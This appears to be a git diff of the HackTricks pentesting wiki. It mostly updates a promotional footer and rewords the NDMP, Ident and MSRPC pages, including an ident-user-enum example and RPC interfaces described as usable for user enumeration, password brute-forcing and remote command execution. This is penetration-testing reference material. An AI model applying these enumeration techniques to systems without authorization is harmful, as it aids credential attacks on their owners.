@@ -119,7 +119,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md index ac8dd2976..f70990d83 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -305,7 +305,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index 88c3287ff..05fdc2190 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -146,7 +146,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index 23aae16b8..b415d126f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -361,7 +361,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md index 448c99045..6e69bab27 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -55,7 +55,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index 47e9db013..a9e06b750 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -161,7 +161,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index 2b2ce0202..e369a9e33 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -192,7 +192,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md index ce05d613e..679476366 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -202,7 +202,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index 06de5abd9..0231befe5 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md 
@@ -470,7 +470,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md index be06df343..469a2d737 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -269,7 +269,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 4983f1a12..4c8445fbc 100644 --- a/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md 
@@ -17,8 +17,9 @@ Other ways to support HackTricks: # **Protocol Information** -**NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. -From [Wikipedia](https://en.wikipedia.org/wiki/NDMP). +From [Wikipedia](https://en.wikipedia.org/wiki/NDMP): + +> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server. **Default port:** 10000 diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md index d1bdd7e59..3f309bee7 100644 --- a/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/network-services-pentesting/1099-pentesting-java-rmi.md @@ -314,6 +314,9 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub * [rmiscout](https://github.com/BishopFox/rmiscout) * [BaRMIe](https://github.com/NickstaDB/BaRMIe) +## References +* [https://github.com/qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) + ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md index a6243cfdb..9b39d23f3 100644 --- a/network-services-pentesting/113-pentesting-ident.md +++ b/network-services-pentesting/113-pentesting-ident.md 
@@ -23,7 +23,9 @@ Get Access Today: ## Basic Information -Is an [Internet](https://en.wikipedia.org/wiki/Internet) [protocol](https://en.wikipedia.org/wiki/Protocol\_\(computing\)) that helps identify the user of a particular [TCP](https://en.wikipedia.org/wiki/Transmission\_Control\_Protocol) connection. +The **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. + +However, due to modern privacy concerns and the potential for misuse, its usage has decreased as it can inadvertently reveal user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks. **Default port:** 113 @@ -50,7 +52,7 @@ Other errors: ### Nmap -By default (-sC) nmap will identify every user of every running port: +By default (`-sC``) nmap will identify every user of every running port: ``` PORT STATE SERVICE VERSION 
@@ -69,7 +71,7 @@ PORT STATE SERVICE VERSION ### Ident-user-enum -Ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. +[**Ident-user-enum**](https://github.com/pentestmonkey/ident-user-enum) is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system. The list of usernames gathered can be used for password guessing attacks on other network services. It can be installed with `apt install ident-user-enum`. ``` root@kali:/opt/local/recon/192.168.1.100# ident-user-enum 192.168.1.100 22 113 139 445 @@ -107,7 +109,7 @@ Entry_1: Name: Notes Description: Notes for Ident Note: | - Is an Internet protocol that helps identify the user of a particular TCP connection. + The Ident Protocol is used over the Internet to associate a TCP connection with a specific user. Originally designed to aid in network management and security, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection. https://book.hacktricks.xyz/pentesting/113-pentesting-ident diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 60a4c8a35..91c476adf 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md 
@@ -72,37 +72,44 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting #### Notable RPC interfaces -**IFID**: 12345778-1234-abcd-ef00-0123456789ab -**Named Pipe**: \pipe\lsarpc -**Description**: LSA interface, used to enumerate users. +* **IFID**: 12345778-1234-abcd-ef00-0123456789ab +* **Named Pipe**: `\pipe\lsarpc` +* **Description**: LSA interface, used to enumerate users. -**IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 -**Named Pipe**: \pipe\lsarpc -**Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. -**IFID**: 12345778-1234-abcd-ef00-0123456789ac -**Named Pipe**: \pipe\samr -**Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. +* **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 +* **Named Pipe**: `\pipe\lsarpc` +* **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. -**IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b -**Named Pipe**: \pipe\atsvc -**Description**: Task scheduler, used to remotely execute commands. -**IFID**: 338cd001-2244-31f1-aaaa-900038001003 -**Named Pipe**: \pipe\winreg -**Description**: Remote registry service, used to access and modify the system registry. +* **IFID**: 12345778-1234-abcd-ef00-0123456789ac +* **Named Pipe**: `\pipe\samr` +* **Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. -**IFID**: 367abb81-9844-35f1-ad32-98f038001003 -**Named Pipe**: \pipe\svcctl -**Description**: Service control manager and server services, used to remotely start and stop services and execute commands. 
-**IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 -**Named Pipe**: \pipe\srvsvc -**Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b +* **Named Pipe**: `\pipe\atsvc` +* **Description**: Task scheduler, used to remotely execute commands. -**IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 -**Named Pipe**: \pipe\epmapper -**Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. + +* **IFID**: 338cd001-2244-31f1-aaaa-900038001003 +* **Named Pipe**: `\pipe\winreg` +* **Description**: Remote registry service, used to access and modify the system registry. + + +* **IFID**: 367abb81-9844-35f1-ad32-98f038001003 +* **Named Pipe**: `\pipe\svcctl` +* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. + + +* **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 +* **Named Pipe**: `\pipe\srvsvc` +* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. + + +* **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 +* **Named Pipe**: `\pipe\epmapper` +* **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. ### Identifying IP addresses @@ -110,7 +117,6 @@ Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDRes This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above). - ## Port 593 The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. 
diff --git a/network-services-pentesting/137-138-139-pentesting-netbios.md b/network-services-pentesting/137-138-139-pentesting-netbios.md index 65b805ebc..6b1877811 100644 --- a/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/network-services-pentesting/137-138-139-pentesting-netbios.md 
